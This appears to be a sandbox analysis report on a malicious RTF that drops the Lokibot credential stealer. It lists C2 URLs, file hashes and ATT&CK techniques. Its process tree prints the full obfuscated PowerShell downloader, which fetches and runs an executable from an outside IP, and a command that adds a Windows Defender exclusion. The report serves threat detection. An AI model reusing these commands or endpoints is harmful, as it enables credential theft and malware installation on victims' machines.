Analysis
-
max time kernel
102s -
max time network
106s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
-
submitted
20-11-2024 10:10
General
-
Target
seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seeth.rtf
-
Size
251KB
-
MD5
e6859034a42f217800b6bf0980e93848
-
SHA1
8dcb69dcf727b7a7fbfbf6755492990dc51fd192
-
SHA256
564a4e9044bd96c3c67ae4c596664a2d9a7ecd1962872ac836e051949fb109b1
-
SHA512
778ceefc76571268a7c82c18ec1b6f6661b4f696d2612528b8eb94488383c84c9dba6613cd5b1c715514e64d062d73d28d84395f30dadb4fd2da51cbac372d35
-
SSDEEP
3072:sUcN1DaxXp1sAkC5gCQqCv7L5FokmFJcmrmR3D:slruZ1sA55gCQBL5FokmFyCmR3D
Malware Config
Extracted
lokibot
http://94.156.177.41/maxzi/five/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Signatures
-
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
-
Lokibot family
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
-
Executes dropped EXE 3 IoCs
-
Loads dropped DLL 3 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
-
Drops file in System32 directory 3 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 46 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seeth.rtf"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta"2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WINDOwSPOWershELL\V1.0\poWERShell.eXe"C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt4⤵
- Evasion via Device Credential Deployment
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\klunhxwy.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES74F2.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC74F1.tmp"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Roaming\wininit.exe"C:\Users\Admin\AppData\Roaming\wininit.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\wininit.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\wininit.exe"C:\Users\Admin\AppData\Roaming\wininit.exe"5⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\wininit.exe"C:\Users\Admin\AppData\Roaming\wininit.exe"5⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Exploitation for Client Execution
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD589305fdda65d73947f803c5d5d091a4f
SHA1482b23036f9eb4e66406aaeb180f4945df9878d9
SHA256ded8bef05d8c334bd02025f80341eabd6412c416bd1870d70376e2e1697378dc
SHA51255b17c46355203dd6668462bf0107a86316639ababe8c0823dba116982ac2cb76051ebf6bd97229be81c1ef30c599c0f1289d00d444f24d1dcf1bdb943f27308
-
Filesize
3KB
MD52199d8595aaf1be3e737f6802a96e1bc
SHA12e35254a31b08f01a6387b58fc1da40f32db4672
SHA256966a05290311a4663d1fd0f1c133f2b0d85ba86a3f2cf4b2223658e50968febf
SHA512c1077ca4743c2978ce33051d5edee78563c72e1444f59353d3208edc3ef635ffa1369d040e630b91baa7fe4350ca33bec6ee551a7314ff283a789561144107f6
-
Filesize
7KB
MD585abcf4e5bbbc4c60ddd892a8362f94d
SHA1dd80d4f21e9ae6177369d12aa2166c279fdd3c76
SHA25695cd0f5128a760c6b211966bfd4cce1ccdb8e6c22cfb663deb81ba89c3f291cf
SHA512ebd6fd66355b0e1afb20f6f4c8f5ac88a082febdbc822c35817811bfbed23ce93a82b93c99e26cd2f9e605e7878332b7e8d0bd74c807e9a25d87de7d50bde9f9
-
Filesize
46B
MD5d898504a722bff1524134c6ab6a5eaa5
SHA1e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA51226a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61
-
Filesize
46B
MD5c07225d4e7d01d31042965f048728a0a
SHA169d70b340fd9f44c89adb9a2278df84faa9906b7
SHA2568c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA51223d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b
-
Filesize
7KB
MD5c04f3c41985cc013413eaf2ceecf6a56
SHA1ccfb117f414652e7d86e4fa5621e963780007e2e
SHA256ee56fedc94cd68206a7f3bdb6b79f94f330526a5619325692cd56efcb859ea46
SHA51271c79fa4f6c7ccb829c44c6a504be4922ac7eed6cbbf06ad99a072f3ad60df687f918c3837b13775b0348fbae0006694ed88bf246fb7a10895614c2018491623
-
Filesize
23KB
MD5ec0d423a3f72d69975a1e31a275f5377
SHA1213922fb8456ecaadc24889afec1ac6ef5010c68
SHA2569fd433cd543ab161d2a3ccb96a265c79ee0bb1a513647c0c33c72114660c64ac
SHA5128132f567abfd4e3489204d1f3a9fc8292457ce10495345cd0ccfa8074233411c8305c4d73078a7dee02b086fbc22b8ad7047dd4bc127de337d0800771edf53ad
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
652B
MD5999c87e859de2b9b8b054d93932f84ac
SHA12271f2cd0b04f2c4c939246e09c73f6464e4d571
SHA256b6c08100f15e6f8599dc10f196b3fd2d1dee3d6e6cf79f6d18f26097e1f1e8a3
SHA512d0f88c16fc5100440eff04be383fceb1c3118288275022e35a0cb8058898cdc56b0751aa571374ea2054c03af63a73d8fb4fb70406675023c300760ef8cead2e
-
Filesize
480B
MD5b0517586f4097114e790c61f2685f0d5
SHA120f7482298ab96731228ebd5242ceddfd72ff50f
SHA256a738e3af6f29edd637630b0299f306056042ea1c73850eee95498499f5d90237
SHA512c28702017ce7fe0d34bea38cef48df3bb65c63d92dddd6f8264f7262f7ae61b8d71bcd6fec06d0792373d15ba84fb2a1d0c26b0fe5755bc20505a9197d654ba0
-
Filesize
309B
MD5c92670f3725404e64b76b8d9980423fc
SHA15d13b67ece4a024ab25fb99b91c22606c1a7e19d
SHA256377d8c2b51a5cb5db8089cb24d224dbbeb8c5948d489ecd216f4735b40156c29
SHA5125f4989b0e1280eefcb58a10a83fd009cedde8b91d0d98e47f28f53b0bf0475e567544736a8f65cdfebb1b643bfeba938781539fd37226488c8b2748b4c01b072
-
Filesize
586KB
MD566b03d1aff27d81e62b53fc108806211
SHA12557ec8b32d0b42cac9cabde199d31c5d4e40041
SHA25659586e753c54629f428a6b880f6aff09f67af0ace76823af3627dda2281532e4
SHA5129f8ef3dd8c482debb535b1e7c9155e4ab33a04f8c4f31ade9e70adbd5598362033785438d5d60c536a801e134e09fcd1bc80fc7aed2d167af7f531a81f12e43d
-
Filesize
4KB
-
Filesize
44KB
-
Filesize
64KB
-
Filesize
44KB
-
Filesize
648KB
-
Filesize
648KB
-
Filesize
648KB
-
Filesize
4KB
-
Filesize
648KB
-
Filesize
648KB
-
Filesize
648KB
-
Filesize
648KB
-
Filesize
648KB
-
Filesize
648KB
-
Filesize
400KB
-
Filesize
72KB
-
Filesize
608KB